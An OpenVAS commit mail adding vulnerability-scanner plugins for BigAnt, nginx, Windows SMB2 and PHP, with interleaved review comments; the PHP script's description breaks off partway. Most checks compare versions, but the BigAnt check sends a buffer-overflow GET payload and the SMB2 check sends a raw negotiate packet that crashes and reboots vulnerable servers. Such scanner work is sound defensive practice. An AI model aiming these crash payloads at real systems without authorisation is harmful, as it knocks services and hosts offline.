[Openvas-commits] r5349 - in trunk/openvas-plugins: . scripts

Thu Oct 1 18:57:34 CEST 2009


Author: mime
Date: 2009-10-01 18:57:31 +0200 (Thu, 01 Oct 2009)
New Revision: 5349

Added:
   trunk/openvas-plugins/scripts/BigAnt_36407.nasl
   trunk/openvas-plugins/scripts/BigAnt_detect.nasl
   trunk/openvas-plugins/scripts/ms_smb2_highid.nasl
   trunk/openvas-plugins/scripts/nginx_36384.nasl
   trunk/openvas-plugins/scripts/nginx_36438.nasl
   trunk/openvas-plugins/scripts/nginx_36490.nasl
   trunk/openvas-plugins/scripts/nginx_detect.nasl
   trunk/openvas-plugins/scripts/php_restriction_bypass.nasl
   trunk/openvas-plugins/scripts/postgreSQL_multiple_security_vulnerabilities.nasl
   trunk/openvas-plugins/scripts/warftpd_20944.nasl
Modified:
   trunk/openvas-plugins/ChangeLog
   trunk/openvas-plugins/cve_current.txt
Log:
Added new plugins

Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog	2009-10-01 10:15:29 UTC (rev 5348)
+++ trunk/openvas-plugins/ChangeLog	2009-10-01 16:57:31 UTC (rev 5349)
@@ -1,3 +1,17 @@
+2009-10-01  Michael Meyer <michael.meyer at intevation.de>
+
+	* scripts/BigAnt_36407.nasl,
+	scripts/warftpd_20944.nasl,
+	scripts/nginx_36384.nasl,
+	scripts/postgreSQL_multiple_security_vulnerabilities.nasl,
+	scripts/nginx_detect.nasl,
+	scripts/nginx_36438.nasl,
+	scripts/ms_smb2_highid.nasl,
+	scripts/BigAnt_detect.nasl,
+	scripts/php_restriction_bypass.nasl,
+	scripts/nginx_36490.nasl:
+	Added new plugins.
+
 2009-10-01  Chandrashekhar B <bchandra at secpod.com>
 
 	* scripts/secpod_an_image_gallery_xss_vuln.nasl,

Modified: trunk/openvas-plugins/cve_current.txt
===================================================================
--- trunk/openvas-plugins/cve_current.txt	2009-10-01 10:15:29 UTC (rev 5348)
+++ trunk/openvas-plugins/cve_current.txt	2009-10-01 16:57:31 UTC (rev 5349)
@@ -88,4 +88,14 @@
 CVE-2009-3473			SecPod
 CVE-2009-3472 			SecPod
 CVE-2009-3478 			SecPod
-
+36407                           Greenbone       svn             R
+CVE-2006-5789                   Greenbone       svn             R
+CVE-2009-2629                   Greenbone       svn             R
+CVE-2009-3229                   Greenbone       svn             R
+CVE-2009-3230                   Greenbone       svn             R
+CVE-2009-3231                   Greenbone       svn             R
+36438                           Greenbone       svn             R
+36555                           Greenbone       svn             R
+36554                           Greenbone       svn             R
+36490                           Greenbone       svn             R
+CVE-2009-3103                   Greenbone       svn             R

Added: trunk/openvas-plugins/scripts/BigAnt_36407.nasl
===================================================================
--- trunk/openvas-plugins/scripts/BigAnt_36407.nasl	2009-10-01 10:15:29 UTC (rev 5348)
+++ trunk/openvas-plugins/scripts/BigAnt_36407.nasl	2009-10-01 16:57:31 UTC (rev 5349)
@@ -0,0 +1,96 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# BigAnt IM Server HTTP GET Request Buffer Overflow Vulnerability
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100278);
+ script_bugtraq_id(36407);
+ script_version ("1.0-$Revision$");
+
+ script_name("BigAnt IM Server HTTP GET Request Buffer Overflow Vulnerability");
+
+desc = "Overview:
+BigAnt IM Server is prone to a remote buffer-overflow vulnerability
+because it fails to perform adequate boundary checks on user-
+supplied input.
+
+An attacker can exploit this issue to execute arbitrary code with the
+privileges of the user running the server. Failed exploit attempts
+will result in a denial-of-service condition.
+
+BigAnt IM Server 2.50 is vulnerable; other versions may also be
+affected.
+
+NOTE: This issue may be related to the vulnerability described in BID
+      28795 (BigAnt IM Server HTTP GET Request Remote Buffer Overflow
+      Vulnerability). We will update or retire this BID if further
+      analysis or reports reveal that the two records represent the
+      same vulnerability.
+
+Solution:
+Updates are available. Please contact the vendor for details.
+
+References:
+http://www.securityfocus.com/bid/36407
+http://www.bigantsoft.com
+
+Risk factor : High";
+
+ script_description(desc);
+ script_summary("Determine if BigAnt IM Server is prone to a remote buffer-overflow vulnerability");
+ script_category(ACT_GATHER_INFO);
+ script_family("Buffer overflow");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes","BigAnt_detect.nasl");
+ script_require_ports("Services/BigAnt", 6660);
+ exit(0);
+}
+
+include("http_func.inc");
+
+if(safe_checks())exit(0);
+
+#port = get_kb_item("Services/BigAnt");
+port = 6660;
+if(!port)exit(0);
+if(!get_port_state(port))exit(0);
+
+payload =  crap(data:raw_string(0x41), length: 985);
+payload += raw_string(0xeb,0x06,0x90,0x90,0x6a,0x19,0x9a,0x0f);
+payload += crap(data:raw_string(0x90),length: 10);
+
+soc = open_sock_tcp(port);
+if(!soc)exit(0);
+
+req = string("GET ", payload, "\r\n\r\n"); 
+send(socket:soc, data:req);
+if(http_is_dead(port: port)) {
+    security_hole(port:port);
+    exit(0); 
+}	
+
+exit(0);
+
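Review bot: The script sends a request built to crash the service and then tests `http_is_dead`, yet it declares `script_category(ACT_GATHER_INFO)`, so the scanner schedules it with passive information gathering instead of treating it as a denial-of-service probe; `script_category(ACT_DENIAL);` matches what the code does. ms_smb2_highid.nasl in this commit has the same mismatch, and its own comment says a vulnerable host reboots. Separately, the KB lookup `#port = get_kb_item("Services/BigAnt");` is commented out and `port = 6660;` hard-coded, so the service port registered by BigAnt_detect.nasl and named in `script_require_ports` is ignored and the `if(!port)exit(0);` guard is dead; `port = get_kb_item("Services/BigAnt"); if(!port) port = 6660;` restores the intended flow. The socket from `open_sock_tcp(port)` is never closed on either path.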


Property changes on: trunk/openvas-plugins/scripts/BigAnt_36407.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/BigAnt_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/BigAnt_detect.nasl	2009-10-01 10:15:29 UTC (rev 5348)
+++ trunk/openvas-plugins/scripts/BigAnt_detect.nasl	2009-10-01 16:57:31 UTC (rev 5349)
@@ -0,0 +1,71 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# BigAnt IM Server Detection
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100280);
+ script_version ("1.0-$Revision$");
+
+ script_name("BigAnt IM Server Detection");
+
+ desc = "Overview:
+This host is running BigAnt IM Server, a instant messaging solution
+for enterprise.
+
+See also:
+http://www.bigantsoft.com/
+
+Risk factor : None";
+
+ script_description(desc);
+ script_summary("Checks for the presence of BigAnt IM Server");
+ script_category(ACT_GATHER_INFO);
+ script_family("Service detection");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes");
+ exit(0);
+}
+
+include("http_func.inc");
+include("global_settings.inc");
+include("misc_func.inc");
+
+port = get_http_port(default:6660);
+if(!get_port_state(port))exit(0);
+
+banner = get_http_banner(port: port);
+if(!banner)exit(0);
+
+if(egrep(pattern:"AntServer", string:banner))
+ {
+  register_service(port:port, ipproto:"tcp", proto:"BigAnt");
+  if(report_verbosity > 0) {
+   security_note(port:port);
+  }
+ }
+
+exit(0);
+
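Review bot: The fingerprint `egrep(pattern:"AntServer", string:banner)` matches that token anywhere in the returned headers rather than in the Server header, so any response that happens to contain it registers the port as `BigAnt` and every dependent check then runs against that host; anchoring it, `egrep(pattern:"^Server:.*AntServer", string:banner, icase:TRUE)`, limits the match to what get_http_banner is meant to provide. The exact header BigAnt emits is not visible here, so confirm the form against a live instance before tightening. Unlike nginx_detect.nasl in this commit, no `script_require_ports("Services/www", 6660);` is declared, so the script is scheduled on every host and relies on `get_port_state` alone.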


Property changes on: trunk/openvas-plugins/scripts/BigAnt_detect.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/ms_smb2_highid.nasl
===================================================================
--- trunk/openvas-plugins/scripts/ms_smb2_highid.nasl	2009-10-01 10:15:29 UTC (rev 5348)
+++ trunk/openvas-plugins/scripts/ms_smb2_highid.nasl	2009-10-01 16:57:31 UTC (rev 5349)
@@ -0,0 +1,121 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Microsoft Windows SMB2 '_Smb2ValidateProviderCallback()' Remote Code Execution Vulnerability
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100283);
+ script_bugtraq_id(36299);
+ script_cve_id("CVE-2009-3103");
+ script_version ("1.0-$Revision$");
+
+ script_name("Microsoft Windows SMB2 '_Smb2ValidateProviderCallback()' Remote Code Execution Vulnerability");
+
+desc = "Overview:
+Microsoft Windows is prone to a remote code-execution vulnerability
+when processing the protocol headers for the Server Message Block
+(SMB) Negotiate Protocol Request.
+
+NOTE: Reportedly, for this issue to be exploitable, file sharing must
+      be enabled.
+
+An attacker can exploit this issue to execute code with SYSTEM-level
+privileges; failed exploit attempts will likely cause denial-of-
+service conditions.
+
+Windows 7 RC, Vista and 2008 Server are vulnerable; other versions may
+also be affected.
+
+NOTE: Reportedly, Windows XP and 2000 are not affected.
+
+UPDATE (September 9, 2009): Symantec has confirmed the issue on
+Windows Vista SP1 and Windows Server 2008.
+
+i
+References:
+http://www.securityfocus.com/bid/36299
+http://blog.48bits.com/?p=510#more-510
+http://www.microsoft.com/technet/security/advisory/975497.mspx
+http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx
+http://www.microsoft.com/windows/windows-7/
+http://www.reversemode.com/index.php?option=com_content&task=view&id=64&Itemid=1
+http://blogs.technet.com/srd/archive/2009/09/18/update-on-the-smb-vulnerability.aspx
+http://www.microsoft.com/windows/products/windowsvista/default.mspx
+http://g-laurent.blogspot.com/2009/09/windows-vista7-smb20-negotiate-protocol.html
+http://www.securityfocus.com/archive/1/506300
+http://www.securityfocus.com/archive/1/506327
+http://www.kb.cert.org/vuls/id/135940
+
+Risk factor : High";
+
+ script_description(desc);
+ script_summary("Determine if Microsoft Windows is prone to a remote code-execution vulnerability");
+ script_category(ACT_GATHER_INFO);
+ script_family("Windows");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes", "smtpserver_detect.nasl");
+ script_require_ports(445);
+ exit(0);
+}
+
+include("misc_func.inc");
+include("network_func.inc");
+
+if(safe_checks())exit(0);
+
+port = 445;
+if(!get_port_state(port))exit(0);
+
+soc = open_sock_tcp(port);
+if(!soc)exit(0);
+
+data = raw_string(0x00,0x00,0x00,0x90,0xff,0x53,0x4d,0x42,0x72,0x00,0x00,0x00,0x00,0x18,0x53,0xc8,
+                  0x00,0x26,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff,0xff,0xfe,
+                  0x00,0x00,0x00,0x00,0x00,0x6d,0x00,0x02,0x50,0x43,0x20,0x4e,0x45,0x54,0x57,0x4f,
+                  0x52,0x4b,0x20,0x50,0x52,0x4f,0x47,0x52,0x41,0x4d,0x20,0x31,0x2e,0x30,0x00,0x02,
+                  0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x31,0x2e,0x30,0x00,0x02,0x57,0x69,0x6e,0x64,0x6f,
+                  0x77,0x73,0x20,0x66,0x6f,0x72,0x20,0x57,0x6f,0x72,0x6b,0x67,0x72,0x6f,0x75,0x70,
+                  0x73,0x20,0x33,0x2e,0x31,0x61,0x00,0x02,0x4c,0x4d,0x31,0x2e,0x32,0x58,0x30,0x30,
+                  0x32,0x00,0x02,0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x32,0x2e,0x31,0x00,0x02,0x4e,0x54,
+                  0x20,0x4c,0x4d,0x20,0x30,0x2e,0x31,0x32,0x00,0x02,0x53,0x4d,0x42,0x20,0x32,0x2e,
+                  0x30,0x30,0x32,0x00); # Tested against 2008 Server. A vulnerable Server doing a reboot. I'm not happy with that, but a the moment i have no idea how to detect this vulnerability without exploiting it.
+
+send(socket: soc, data: data);
+close(soc);
+
+sleep(2);
+
+soc1 = open_sock_tcp(port);
+
+ if(!soc1) {
+   security_hole(port:port);
+   exit(0);
+ } else {
+   close(soc1);
+ }
+
+exit(0);
+
+  
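Review bot: A hole is reported whenever the reconnect after `sleep(2)` fails, so any transient failure on port 445 during a scan (connection limits, a filtering device reacting to the probe) is reported as CVE-2009-3103 with no way to tell a crash from noise; retrying `open_sock_tcp(port)` a few times over a longer window before concluding, and reporting only when all attempts fail, would cut the false positives this check will otherwise produce. The description text has a stray `i` line just before `References:`, which will show up verbatim in reports. `script_dependencies("find_service.nes", "smtpserver_detect.nasl")` names an SMTP detection script for a port-445 check, which looks like a copy-paste remnant; the intent is presumably a SMB/NetBIOS detection script, so confirm which one.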


Property changes on: trunk/openvas-plugins/scripts/ms_smb2_highid.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/nginx_36384.nasl
===================================================================
--- trunk/openvas-plugins/scripts/nginx_36384.nasl	2009-10-01 10:15:29 UTC (rev 5348)
+++ trunk/openvas-plugins/scripts/nginx_36384.nasl	2009-10-01 16:57:31 UTC (rev 5349)
@@ -0,0 +1,91 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# nginx HTTP Request Remote Buffer Overflow Vulnerability
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100276);
+ script_bugtraq_id(36384);
+ script_cve_id("CVE-2009-2629");
+ script_version ("1.0-$Revision$");
+
+ script_name("nginx HTTP Request Remote Buffer Overflow Vulnerability");
+
+desc = "Overview:
+The 'nginx' program is prone to a buffer-overflow vulnerability
+because the application fails to perform adequate boundary checks on
+user-supplied data.
+
+Attackers can exploit this issue to execute arbitrary code within the
+context of the affected application. Failed exploit attempts will
+result in a denial-of-service condition.
+
+Solution:
+Updates are available. Please see the references for more information.
+
+References:
+http://www.securityfocus.com/bid/36384
+http://nginx.net/CHANGES-0.5
+http://nginx.net/CHANGES-0.6
+http://nginx.net/CHANGES-0.7
+http://nginx.net/CHANGES
+http://nginx.net/
+http://www.kb.cert.org/vuls/id/180065
+
+Risk factor : Medium";
+
+ script_description(desc);
+ script_summary("Determine if nginx is prone to a buffer-overflow vulnerability");
+ script_category(ACT_GATHER_INFO);
+ script_family("Web Servers");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("nginx_detect.nasl");
+ script_require_ports("Services/www", 80);
+ exit(0);
+}
+
+include("http_func.inc");
+include("version_func.inc");
+
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+
+if(!vers = get_kb_item(string("nginx/", port, "/version")))exit(0);
+if(!isnull(vers) && vers >!< "unknown") {
+
+  if(
+     version_is_less(version: vers, test_version:"0.5.38")                      ||
+     version_in_range(version:vers, test_version:"0.6", test_version2:"0.6.38") ||
+     version_in_range(version:vers, test_version:"0.7", test_version2:"0.7.61") ||
+     version_in_range(version:vers, test_version:"0.8", test_version2:"0.8.14")
+    ) {
+
+      security_warning(port:port);
+      exit(0);
+  }
+
+}
+
+exit(0);     
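Review bot: `if(!vers = get_kb_item(string("nginx/", port, "/version")))exit(0);` already exits on a null or empty value, so the `!isnull(vers)` in the next condition is dead and the extra block level only adds indentation; `if(vers >!< "unknown") {` reads the same. The same pattern appears in nginx_36438.nasl and nginx_36490.nasl. The result also depends entirely on the version nginx_detect.nasl parsed from the Server header, so installations that hide the version are stored as `unknown` and skipped silently; a sentence in the description saying the check is version-based would set expectations for readers of the report.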


Property changes on: trunk/openvas-plugins/scripts/nginx_36384.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/nginx_36438.nasl
===================================================================
--- trunk/openvas-plugins/scripts/nginx_36438.nasl	2009-10-01 10:15:29 UTC (rev 5348)
+++ trunk/openvas-plugins/scripts/nginx_36438.nasl	2009-10-01 16:57:31 UTC (rev 5349)
@@ -0,0 +1,87 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# nginx Proxy DNS Cache Domain Spoofing Vulnerability
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100277);
+ script_bugtraq_id(36438);
+ script_version ("1.0-$Revision$");
+
+ script_name("nginx Proxy DNS Cache Domain Spoofing Vulnerability");
+
+desc = "Overview:
+The 'nginx' program is prone to a vulnerability that may allow
+attackers to spoof domains because the software fails to properly
+compare domains when referencing an internal DNS cache.
+
+This issue can be exploited when nginx is configured to act as a
+forward proxy, but this is a nonstandard and unsupported
+configuration. Attacks against other configurations may also be
+possible.
+
+Successful exploits may allow remote attackers to intercept traffic
+intended for legitimate websites, which may aid in further attacks.
+
+References:
+http://www.securityfocus.com/bid/36438
+http://nginx.net/
+http://www.securityfocus.com/archive/1/506541
+http://www.securityfocus.com/archive/1/506543
+
+Risk factor : Low";
+
+ script_description(desc);
+ script_summary("Determine if nginx is prone to a Proxy DNS Cache Domain Spoofing Vulnerability");
+ script_category(ACT_GATHER_INFO);
+ script_family("Web Servers");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("nginx_detect.nasl");
+ script_require_ports("Services/www", 80);
+ exit(0);
+}
+
+include("http_func.inc");
+include("version_func.inc");
+
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+
+if(!vers = get_kb_item(string("nginx/", port, "/version")))exit(0);
+if(!isnull(vers) && vers >!< "unknown") {
+
+  if(
+      version_in_range(version:vers, test_version:"0.8", test_version2:"0.8.15") ||
+      version_in_range(version:vers, test_version:"0.7", test_version2:"0.7.62") || 
+      version_in_range(version:vers, test_version:"0.6", test_version2:"0.6.39") ||
+      version_in_range(version:vers, test_version:"0.5", test_version2:"0.5.38") 
+    ) {
+      security_warning(port:port);
+      exit(0);
+  }
+
+}
+
+exit(0);
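Review bot: The description states the issue is only exploitable when nginx is run as a forward proxy, which it calls a nonstandard and unsupported configuration, but the check flags every nginx in the 0.5–0.8.15 ranges by version alone, so the report gives no hint that the finding is inferred and is likely not applicable to most hosts. Adding `NOTE: This check is based solely on the version reported in the Server header and does not verify the proxy configuration.` to the description would make that explicit. The trailing whitespace after several `version_in_range(...)` lines is harmless but worth trimming.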


Property changes on: trunk/openvas-plugins/scripts/nginx_36438.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/nginx_36490.nasl
===================================================================
--- trunk/openvas-plugins/scripts/nginx_36490.nasl	2009-10-01 10:15:29 UTC (rev 5348)
+++ trunk/openvas-plugins/scripts/nginx_36490.nasl	2009-10-01 16:57:31 UTC (rev 5349)
@@ -0,0 +1,85 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# nginx WebDAV Multiple Directory Traversal Vulnerabilities
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100275);
+ script_bugtraq_id(36490);
+ script_version ("1.0-$Revision$");
+
+ script_name("nginx WebDAV Multiple Directory Traversal Vulnerabilities");
+
+desc = "Overview:
+The 'nginx' program is prone to multiple directory-traversal
+vulnerabilities because the software fails to sufficiently sanitize
+user-supplied input.
+
+An attacker can exploit these issues using directory-traversal strings
+('../') to overwrite arbitrary files outside the root directory.
+
+These issues affect nginx 0.7.61 and 0.7.62; other versions may also
+be affected.
+
+References:
+http://www.securityfocus.com/bid/36490
+http://nginx.net/
+http://www.securityfocus.com/archive/1/506662
+
+Risk factor : Medium";
+
+ script_description(desc);
+ script_summary("Determine if nginx Version is 0.7.61 ot 0.7.62");
+ script_category(ACT_GATHER_INFO);
+ script_family("Web Servers");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("nginx_detect.nasl");
+ script_require_ports("Services/www", 80);
+ exit(0);
+}
+
+     
+include("http_func.inc");
+include("http_keepalive.inc");
+include("version_func.inc");
+
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+
+if(!vers = get_kb_item(string("nginx/", port, "/version")))exit(0);
+if(!isnull(vers) && vers >!< "unknown") {
+
+  if(
+     version_is_equal(version: vers, test_version: "0.7.61") ||
+     version_is_equal(version: vers, test_version: "0.7.62")
+    ) {
+      security_warning(port:port);
+      exit(0);
+  }
+
+}
+
+exit(0);
+
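Review bot: `script_summary("Determine if nginx Version is 0.7.61 ot 0.7.62")` has a typo ("ot" for "or") that scanner front-ends display as-is; `script_summary("Determine if nginx version is 0.7.61 or 0.7.62");`. `include("http_keepalive.inc");` is not used by anything in the script (the sibling nginx checks in this commit manage with http_func.inc and version_func.inc), and the whitespace-only line before the includes looks like a leftover.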


Property changes on: trunk/openvas-plugins/scripts/nginx_36490.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/nginx_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/nginx_detect.nasl	2009-10-01 10:15:29 UTC (rev 5348)
+++ trunk/openvas-plugins/scripts/nginx_detect.nasl	2009-10-01 16:57:31 UTC (rev 5349)
@@ -0,0 +1,91 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# nginx Detection
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+# need desc here to modify it later in script.
+desc = "Overview:
+This host is running nginx. nginx [engine x] is a HTTP server and mail
+proxy server written by Igor Sysoev. 
+
+See also:
+http://nginx.net/
+
+Risk factor : None";
+
+if (description)
+{
+ script_id(100274);
+ script_version ("1.0-$Revision$");
+ script_name("nginx Detection");
+ script_description(desc);
+ script_summary("Checks for the presence of nginx");
+ script_category(ACT_GATHER_INFO);
+ script_family("Service detection");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ exit(0);
+}
+
+include("http_func.inc");
+include("global_settings.inc");
+
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+
+ buf = get_http_banner(port: port);
+ if(!buf)exit(0);
+
+ if(egrep(pattern:"Server: nginx/" , string: buf, icase: TRUE))
+ {
+    vers = string("unknown");
+    ### try to get version 
+    version = eregmatch(string: buf, pattern: "Server: nginx/([0-9.]+)",icase:TRUE);
+
+    if ( !isnull(version[1]) ) {
+       vers=chomp(version[1]);
+    }
+
+    set_kb_item(name: string("nginx/", port, "/version"), value: string(vers));
+
+    info = string("None\n\nnginx Version '");
+    info += string(vers);
+    info += string("' was detected on the remote host.");
+
+    desc = ereg_replace(
+        string:desc,
+        pattern:"None$",
+        replace:info
+    );
+
+       if(report_verbosity > 0) {
+         security_note(port:port,data:desc);
+       }
+       exit(0);
+
+ }
+
+exit(0);
+
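Review bot: Detection requires the literal `Server: nginx/` with a slash, so an nginx that sends only `Server: nginx` (which is what nginx does with `server_tokens off`) is never detected, nothing is written to the KB, and the three version checks in this commit silently skip it; matching on `egrep(pattern:"^Server: nginx", string: buf, icase: TRUE)` and leaving the existing `eregmatch` to fill in the version keeps the KB contract, since `vers` is already initialised to `unknown` for the no-number case. The indentation inside the `if` block drifts between one, three, four and seven spaces and the body of the detection could be brought to one level. `report_verbosity` comes from global_settings.inc, which is included, so that part is fine.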


Property changes on: trunk/openvas-plugins/scripts/nginx_detect.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/php_restriction_bypass.nasl
===================================================================
--- trunk/openvas-plugins/scripts/php_restriction_bypass.nasl	2009-10-01 10:15:29 UTC (rev 5348)
+++ trunk/openvas-plugins/scripts/php_restriction_bypass.nasl	2009-10-01 16:57:31 UTC (rev 5349)
@@ -0,0 +1,94 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# PHP multiple Restriction-Bypass Vulnerabilities
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100281);
+ script_bugtraq_id(36555,36554);
+ script_version ("1.0-$Revision$");
+
+ script_name("PHP multiple Restriction-Bypass Vulnerabilities");
+
+desc = "Overview:
+PHP is prone to a 'safe_mode' and to a 'open_basedir'
+restriction-bypass vulnerability. Successful exploits could allow an
+attacker to access files in unauthorized locations or create files in
+any writable directory and in unauthorized locations.
+
+This vulnerability would be an issue in shared-hosting configurations
+where multiple users can create and execute arbitrary PHP script code;
+the 'safe_mode' and the 'open_basedir' restrictions are assumed to
+isolate users from each other.
+
+PHP 5.2.11 and 5.3.0 are vulnerable; other versions may also be
+affected.
+
+Solution:
+Updates are available. Please see the references for details.
+
+References:
+http://www.securityfocus.com/bid/36555
+http://www.securityfocus.com/bid/36554
+http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/ext/standard/file.c?view=log
+http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/standard/file.c?view=log
+http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/ext/posix/posix.c?view=log
+http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/posix/posix.c?view=log
+http://securityreason.com/securityalert/6601
